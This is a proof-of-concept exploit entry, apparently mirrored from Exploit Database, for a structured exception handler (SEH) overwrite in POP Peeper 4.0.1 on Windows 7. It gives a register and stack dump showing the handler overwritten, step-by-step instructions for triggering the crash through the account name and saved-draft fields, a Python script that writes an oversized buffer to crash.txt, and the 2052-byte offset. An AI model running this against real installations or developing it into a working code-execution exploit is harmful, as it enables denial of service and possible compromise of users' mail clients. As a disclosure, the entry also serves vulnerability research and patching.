POP Peeper 4.0.1 – Overwrite (SEH)

• Exploit Database
• 104 阅读

• 作者： Un_N0n
  日期： 2015-11-09
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/38659/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

  ''' ******************************************************************************************** # Exploit Title: POP Peeper SEH Over-write. # Date: 9/14/2015 # Exploit Author: Un_N0n # Software Link: http://www.esumsoft.com/download # Version: v4.0.1 # Tested on: Windows 7 x86(32 BIT) ******************************************************************************************** [DUMP:] ''' EAX 00000000 ECX 20203029 EDX 77C5660D ntdll.77C5660D EBX 00000000 ESP 0012EC5C EBP 0012EC7C ESI 00000000 EDI 00000000   EIP 20203029   ============================== STACK: 0012FBF4 41414141 0012FBF8 41414141 0012FBFC 41414141 0012FC00 41414141 0012FC04 41414141 0012FC08 909020EBPointer to next SE> 0012FC0C 20203029SE handler 0012FC10 43434343 0012FC14 43434343 0012FC18 43434343 0012FC1C 43434343 0012FC20 43434343 0012FC24 43434343 0012FC28 43434343 =============================== '''   [Steps to Produce the Crash]: 1- Open 'POPPeeper.exe' 2- Goto Accounts->Add->CreateSingleAccount. 3- After entering the email address, the option for Account name will appear, enter the contents of crash.txt in it->Save. 4- Then compose a new mail->In TO field and Subject field, enter the contents of crash.txt 5- Save as Draft, software will crash. 6- Open up "POPPeeper.exe" again. 7- Click on Check Mail option, Software will crash. Everytime you click on Check mail, it will crash as it will load the saved DRAFT.   [Code to produce CRASH.txt] '''   buffer = "A"*66666 file = "crash.txt" f = open(file,'w') f.write(buffer) f.close()   ''' [Extra Info:] Offset : 2052 ********************************************************************************************** '''